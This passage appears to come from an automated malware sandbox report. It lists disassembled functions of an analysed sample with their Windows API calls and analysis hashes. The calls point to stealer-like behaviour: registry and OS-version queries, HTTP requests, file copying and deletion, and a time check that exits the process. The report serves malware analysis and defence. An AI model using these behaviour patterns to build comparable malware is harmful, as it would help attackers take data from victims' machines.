                                                          • Part of subcall function 00B27537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B27618
                                                          • Part of subcall function 00B27537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B27674
                                                          • Part of subcall function 00B27537: GetProcessHeap.KERNEL32(00000000,?), ref: 00B276B9
                                                          • Part of subcall function 00B27537: HeapFree.KERNEL32(00000000), ref: 00B276C0
                                                        • lstrcat.KERNEL32(0064A668,004217FC), ref: 00B2786D
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 00B278AF
                                                        • lstrcat.KERNEL32(0064A668,00421800), ref: 00B278C1
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 00B278F6
                                                        • lstrcat.KERNEL32(0064A668,00421804), ref: 00B27907
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 00B2793A
                                                        • lstrcat.KERNEL32(0064A668,00421808), ref: 00B27954
                                                        • task.LIBCPMTD ref: 00B27962
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                        • String ID:
                                                        • API String ID: 2677904052-0
                                                        • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                        • Instruction ID: bedc729543feb421c78f6188188ff6421edba6a30d58b1973172d7455a244abf
                                                        • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                        • Instruction Fuzzy Hash: 41315E79A40119EFDB04FBE0EC95DFE77BAEB55301F205058F10A672A0DE34A942CB65
                                                        Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                        • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                        • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                        • InternetCloseHandle.WININET(?), ref: 004050C6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                        • String ID:
                                                        • API String ID: 3894370878-0
                                                        • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                        • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                        • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                        • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                        Function 00B25217 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B25231
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B25238
                                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00B25251
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B25278
                                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B252A8
                                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 00B252F1
                                                        • InternetCloseHandle.WININET(?), ref: 00B25320
                                                        • InternetCloseHandle.WININET(?), ref: 00B2532D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                        • String ID:
                                                        • API String ID: 1008454911-0
                                                        • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                        • Instruction ID: 7407285280472b4cc9e15fee30f3df434af0ed6486e51c9d9ba6125508fbde8d
                                                        • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                        • Instruction Fuzzy Hash: 1431F8B8A40228EBDB20CF94DC85BDCB7B5EB48704F5081D9F609A7281D7746EC58F99
                                                        Function 00B35777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 00B358AB
                                                        • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00B35908
                                                        • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00B35ABE
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B35457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 00B3548F
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B35527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B3557F
                                                          • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B35596
                                                          • Part of subcall function 00B35527: StrStrA.SHLWAPI(00000000,00000000), ref: 00B355CB
                                                          • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B355EA
                                                          • Part of subcall function 00B35527: strtok.MSVCRT(00000000,?), ref: 00B35605
                                                          • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B35615
                                                        • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 00B359F2
                                                        • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00B35BA7
                                                        • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00B35C73
                                                        • Sleep.KERNEL32(0000EA60), ref: 00B35C82
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                                        • String ID:
                                                        • API String ID: 3630751533-0
                                                        • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                        • Instruction ID: 0b075c65eb3a11c38c68679c85202f9917a4fe8ac32e83bc35c3743da5d5b434
                                                        • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                        • Instruction Fuzzy Hash: 76E15772900204ABCB18FBB0DD96DED73B9AF66701F7085ACB44666191EF346F48CB52
                                                        Function 00B21577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00B2158E
                                                          • Part of subcall function 00B21507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2151B
                                                          • Part of subcall function 00B21507: RtlAllocateHeap.NTDLL(00000000), ref: 00B21522
                                                          • Part of subcall function 00B21507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B2153E
                                                          • Part of subcall function 00B21507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B2155C
                                                          • Part of subcall function 00B21507: RegCloseKey.ADVAPI32(?), ref: 00B21566
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B215B6
                                                        • lstrlen.KERNEL32(?), ref: 00B215C3
                                                        • lstrcat.KERNEL32(?,004262EC), ref: 00B215DE
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B216CC
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                          • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                          • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                          • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                          • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                          • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B21756
                                                        • memset.MSVCRT ref: 00B2177D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                        • String ID:
                                                        • API String ID: 3885987321-0
                                                        • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                        • Instruction ID: 1fd90f10a2ae4b3b424127d46309a48dafbef2f9e0c9558077e97aebc3f82c7a
                                                        • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                        • Instruction Fuzzy Hash: 685151B2940218ABCB15FB60DD92EED73BCEF55700F6041E8B64A62091EE305B89CF56
                                                        Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,008267A8,?,0042110C,?,00000000,?), ref: 0041696C
                                                        • sscanf.NTDLL ref: 00416999
                                                        • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,008267A8,?,0042110C), ref: 004169B2
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,008267A8,?,0042110C), ref: 004169C0
                                                        • ExitProcess.KERNEL32 ref: 004169DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$System$File$ExitProcesssscanf
                                                        • String ID: B
                                                        • API String ID: 2533653975-2248957098
                                                        • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                        • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                        • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                        • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                        Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                        • wsprintfA.USER32 ref: 00418459
                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        • RegQueryValueExA.ADVAPI32(00000000,00829BA0,00000000,000F003F,?,00000400), ref: 004184EC
                                                        • lstrlenA.KERNEL32(?), ref: 00418501
                                                        • RegQueryValueExA.ADVAPI32(00000000,00829D80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                        • String ID: %s\%s
                                                        • API String ID: 3896182533-4073750446
                                                        • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                        • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                        • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                        • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                        Function 00B24A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ??2@$CrackInternetlstrlen
                                                        • String ID: <
                                                        • API String ID: 1683549937-4251816714
                                                        • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                        • Instruction ID: 5187fc8eaa553716601274e31fa58b587f700f9cb71d89d3c72375ae472e6b16
                                                        • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                        • Instruction Fuzzy Hash: AD215BB5D00219ABDF10EFA4E849AED7BB4FF05321F108225F965A72D0EB706A05CF91
                                                        Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                        • RegOpenKeyExA.ADVAPI32(80000002,008245C8,00000000,00020119,00000000), ref: 004176DD
                                                        • RegQueryValueExA.ADVAPI32(00000000,00829B88,00000000,00000000,?,000000FF), ref: 004176FE
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3466090806-2517555085
                                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                        Function 00B378F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3790B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37912
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00B37944
                                                        • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00B37965
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B3796F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3225020163-2517555085
                                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction ID: 4c24ff272e2303af86a5c3289b201837adc38b684d17126928c3ed912d1c0aa9
                                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction Fuzzy Hash: 2F012CBDA84208BBEB10DBE0DD49FADB7B9EB48701F105294FA05A6281DA7499008B51
                                                        Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                        • RegOpenKeyExA.ADVAPI32(80000002,008245C8,00000000,00020119,004176B9), ref: 0041775B
                                                        • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                        • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID: CurrentBuildNumber
                                                        • API String ID: 3466090806-1022791448
                                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                        Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                        • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSize
                                                        • String ID: :A$:A
                                                        • API String ID: 1378416451-1974578005
                                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                        Function 00B27537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B275A1
                                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B27618
                                                        • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B27674
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B276B9
                                                        • HeapFree.KERNEL32(00000000), ref: 00B276C0
                                                          • Part of subcall function 00B294A7: vsprintf_s.MSVCRT ref: 00B294C2
                                                        • task.LIBCPMTD ref: 00B277BC
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                        • String ID:
                                                        • API String ID: 700816787-0
                                                        • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                        • Instruction ID: c239a29516c48e6a5a7e722e29fb695a110170696b88fb0cc96802c9b4aa1055
                                                        • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                        • Instruction Fuzzy Hash: 526106B59442689BDB24DB50DC95FE9B7B8BF48300F0081E9E649A6241DFB06AC5CF94
                                                        Function 00B35527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B264E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
                                                          • Part of subcall function 00B264E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 00B2656A
                                                          • Part of subcall function 00B264E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
                                                          • Part of subcall function 00B264E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
                                                          • Part of subcall function 00B264E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
                                                          • Part of subcall function 00B264E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B26638
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B3557F
                                                        • lstrlen.KERNEL32(00000000), ref: 00B35596
                                                          • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00B355CB
                                                        • lstrlen.KERNEL32(00000000), ref: 00B355EA
                                                        • strtok.MSVCRT(00000000,?), ref: 00B35605
                                                        • lstrlen.KERNEL32(00000000), ref: 00B35615
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        Memory Dump Source
